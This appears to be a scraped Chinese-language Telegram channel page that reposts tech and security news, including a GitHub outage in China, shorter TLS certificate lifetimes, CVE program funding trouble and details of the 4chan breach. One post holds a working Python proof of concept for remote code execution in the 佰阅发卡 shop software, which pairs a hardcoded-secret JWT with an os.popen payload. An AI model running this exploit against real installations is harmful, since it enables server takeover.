Puddin在TG上看到了啥
782 subscribers
1.67K photos
70 videos
87 files
2.43K links
会把想要收藏的东西堆在这里
#日常 #数码 #科技 #渗透 #碎碎念
Download Telegram
github 403未登陆中国大陆IP用户

大概是主动屏蔽?
切了https重新测,这下全都是403了
Forwarded from 科技圈🎗在花频道📮
GitHub目前已恢复中国大陆访问

更新:Github称无法在中国大陆访问是由于意外
Due to a configuration change with unintended impact, users that were not logged in who tried to visit GitHub.com from China were temporarily unable to access the site. For users already logged in, they could continue to access the site successfully. Impact started 2025/04/12 at 20:01 UTC. Impact was mitigated 2025/04/13 at 14:55 UTC.

The configuration changes that caused this impact have been reversed and users should no longer see problems when trying to access GitHub.com.

Itdog
GitHub Status

📮投稿 ☘️频道 🌸聊天
Forwarded from 每日消费电子观察 (玉米狐狸 | 啊米玉说的道理)
一年SSL证书将逐渐成为历史,CA/B论坛SC-081v3提案几乎全票通过

从26年开始,可签发的SSL/TLS证书的最长时间将分三年从原来的398天逐步缩减到47天

意味着你不得不去实现自动部署,长有效期证书的时代即将终结


https://groups.google.com/a/groups.cabforum.org/g/servercert-wg/c/9768xgUUfhQ
https://forum.naixi.net/thread-3496-1-1.html
https://github.com/cabforum/servercert/pull/553
看门狗(确信)
请找出图中的漏洞,绕过safe = blackJack(name)

解:

图中的safe = blackJack(name)是赋值而不是创建变量

所以可以用条件竞争,让 ... safe := os.Open(...夹在safe = blackJack(name)safe != nil 中间执行,把本来不为nil的safe变量强行变为nil

这就是新生赛的含金量吗
🤯4
果然并发是万恶之源
This media is not supported in your browser
VIEW IN TELEGRAM
🥰2
哈尔滨市公安局公开通缉3名美国国家安全局(NSA)特工
为依法严厉打击境外势力对我网络攻击窃密犯罪,切实维护国家网络空间安全和人民生命财产安全,黑龙江省哈尔滨市公安局决定对3名隶属于美国国家安全局(NSA)的犯罪嫌疑人凯瑟琳·威尔逊(Katheryn A. Wilson)、罗伯特·思内尔(Robert J. Snelling)、斯蒂芬·约翰逊(Stephen W. Johnson)进行通缉。
#吃瓜
👏2
🚾📦
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from LoopDNS资讯播报
美国政府决定无限期限制英伟达对中国出口专用人工智能(AI)芯片"H20"的出口。 当初感觉到放宽限制的氛围,期待恢复出口,但最近随着中国对美国产品征收报复关税,美国再次转向勒紧限制缰绳的方向。

来源:每日经济 / Wall St Engine
Forwarded from 科技圈🎗在花频道📮
美国CVE漏洞数据库面临资金枯竭危机

美国非营利组织 MITRE 负责维护的全球网络安全关键漏洞数据库——“常见漏洞与披露”(CVE),由政府提供的资金将于本周三到期,或将面临停摆。

CVE漏洞数据库是全球网络安全生态系统的重要基石,为各组织提供漏洞编号、严重程度分级及详细描述。安全专家担忧,一旦CVE漏洞数据库停摆,将严重冲击全球漏洞管理与应变机制,对企业和 CERT(电脑紧急应变小组)等都将产生“快速且严重”的连锁反应。

路透社

📮投稿 ☘️频道 🌸聊天
😱3
佰阅发卡存在RCE漏洞,省流:eval解析json+硬编码JWT secret

POC:

import requests

cmd = "ls /"
url = "http://xxx"
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6eyJlbWFpbCI6ImFkbWluQHFxLmNvbSJ9LCJleHAiOjE3NDQ4NzExNDZ9.jf8YjUqXWVschKPSvKjv7lcQZrhynLla6AWqH6WWavg"
resp = requests.post(
url + "/api/v4/update_pays",
headers={"Authorization": "Bearer " + jwt_token},
json={
"data": {
# "config": f"[exec({payload!r}), f()][-1]",
"config": f"__import__('os').popen({cmd!r}).read()",
"icon": "\u652f\u4ed8\u5b9d",
"id": 2,
"info": "0\u8d39\u7387\u5b9e\u65f6\u5230\u8d26",
"isactive": False,
"name": "V\u514d\u7b7e\u652f\u4ed8\u5b9d",
}
},
)
resp = requests.get(
url + "/api/v4/get_pays",
headers={"Authorization": "Bearer " + jwt_token},
)
print([item["config"] for item in resp.json() if item.get("id") == 2].pop())



https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g
Forwarded from [Patience Forever] (₴łⱠVɆⱤ₩ØⱠ₣)
4chan黑客攻击细节:4chan使用了2012年版本的GhostScript用于解析PDF并生成缩略图。然而由于他们没有判断PDF文件是否为真实的PDF,因此可以上传包含PostScript命令的恶意文件触发RCE,随后黑客找到了配置错误的SUID文件进行提权

https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509
https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection
Forwarded from Pseudorandom Thoughts
https://www.kandji.io/blog/pasivrobber

TLDR:恁美国OSINT又对着China哈气了,路边拾了个美亚的取证工具一通分析然后怪他主机信息收集太多

Meiya:什么叫我竟然收集信息了,我不收集信息我干嘛
:你们美国OSINT就不能至少要求一下,做中国威胁情报一定要懂汉语
:错了 做中国情报一定要不懂汉语(
不然就不好意思喊了
😁1